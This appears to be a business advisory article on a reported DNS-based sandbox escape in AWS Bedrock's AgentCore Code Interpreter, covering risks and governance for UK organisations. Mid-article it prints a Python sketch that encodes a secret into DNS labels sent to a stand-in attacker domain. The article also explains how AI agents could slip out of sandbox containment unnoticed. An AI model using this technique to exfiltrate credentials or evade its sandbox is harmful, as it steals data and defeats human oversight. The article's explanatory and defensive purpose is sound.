AI & Technology

AWS AI Sandbox Cracked Open Through DNS Attack Vector

16 March 2026 · 4 min read


Security researchers have exposed a fundamental architectural weakness in Amazon Web Services' AI execution environment that allows artificial intelligence agents to escape sandbox containment and exfiltrate sensitive cloud data. The vulnerability demonstrates how even sophisticated cloud providers can overlook basic security boundaries when implementing AI services at scale.

The flaw affects AWS Bedrock's AgentCore Code Interpreter, which is designed to execute AI-generated code within isolated sandbox environments. These sandboxes are critical security controls that prevent AI agents from accessing unauthorised resources or compromising the broader cloud infrastructure. However, researchers found that the isolation fails at the DNS level, creating a pathway for data theft that bypasses traditional security monitoring.

Key Facts:
- AWS Bedrock AgentCore Code Interpreter sandbox isolation can be bypassed through DNS queries
- AI agents can exfiltrate cloud credentials and sensitive data through domain name lookups
- The vulnerability affects organisations using AWS AI services for automated decision-making and data processing
- DNS-based attacks are particularly difficult to detect using conventional security tools

How DNS Becomes a Data Highway

According to reporting from Infosecurity Magazine, the vulnerability allows malicious AI agents or compromised code to encode sensitive information within DNS queries and transmit it to attacker-controlled domains. This technique exploits the fact that DNS queries are typically permitted even within restricted environments, as they are considered essential for basic network functionality.

The attack works by embedding stolen data in the subdomain labels of DNS queries, effectively turning the domain name system into a covert communication channel. For organisations processing confidential information through AI workflows, this represents a significant exposure that traditional data loss prevention tools may not detect.
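To make the technique concrete, the sketch below shows how an arbitrary secret could be chunked into DNS-safe labels and appended to an attacker-controlled domain. This is an illustrative reconstruction of the general DNS-exfiltration pattern described above, not the researchers' actual exploit code; the domain name and key value are invented for the example.

```python
import base64

MAX_LABEL = 63  # RFC 1035 limits each DNS label to 63 octets


def encode_for_dns(secret: bytes, attacker_domain: str) -> list[str]:
    """Split a secret into DNS-safe base32 labels and build query names.

    Resolving each hostname leaks one chunk of the secret to whoever
    operates the authoritative nameserver for attacker_domain.
    """
    # Base32 keeps the payload within the DNS hostname character set.
    payload = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [payload[i:i + MAX_LABEL] for i in range(0, len(payload), MAX_LABEL)]
    # Prefix each chunk with a sequence number so the receiver can reassemble.
    return [f"{i}-{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]


# Hypothetical credential and domain, for illustration only.
names = encode_for_dns(b"AKIAEXAMPLEACCESSKEY", "exfil.example.net")
```

Because every label is valid hostname syntax, these lookups pass through most resolvers unchallenged, which is precisely why permitting outbound DNS from a sandbox undermines its isolation.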

The timing of this discovery is particularly concerning given the rapid adoption of AI services across UK businesses. Many organisations are integrating AI agents into their core operations without fully understanding the security implications of allowing artificial intelligence to execute code within their cloud environments.

What This Means for UK Business Operations

For UK businesses using AWS AI services, this vulnerability creates immediate operational risks that extend beyond simple data theft. AI agents with access to cloud credentials could potentially provision additional resources, modify security configurations, or access databases containing customer information subject to GDPR protection.

The NCSC has previously warned about the security challenges posed by AI systems that operate with elevated privileges within cloud environments. This vulnerability validates those concerns by demonstrating how sandbox isolation—a fundamental security control—can fail in unexpected ways when dealing with AI-generated code.

Organisations in regulated sectors face particular exposure, as AI agents processing sensitive data could inadvertently or maliciously transmit protected information to external parties. The subtle nature of DNS exfiltration means that such breaches might continue undetected for extended periods, compounding the potential compliance and reputational damage.

Beyond Technical Controls: Governance Implications

This incident highlights why technical security controls alone are insufficient for managing AI risks. The vulnerability exists not because of coding errors, but due to architectural assumptions about how AI agents would behave within sandbox environments. This suggests that organisations need governance frameworks that account for the unique behaviours and capabilities of artificial intelligence systems.

The EU's AI Act emphasises the importance of risk assessment and monitoring for AI systems used in business operations. Vulnerabilities like this demonstrate why such oversight requirements are necessary, as AI systems can create attack vectors that traditional security assessments might miss.

For UK businesses evaluating AI services, this serves as a reminder that cloud provider security certifications do not guarantee protection against novel attack vectors. Due diligence must include understanding how AI systems are isolated and monitored, particularly when processing sensitive business data.


PTG Advisory Team
Pacific Technology Group

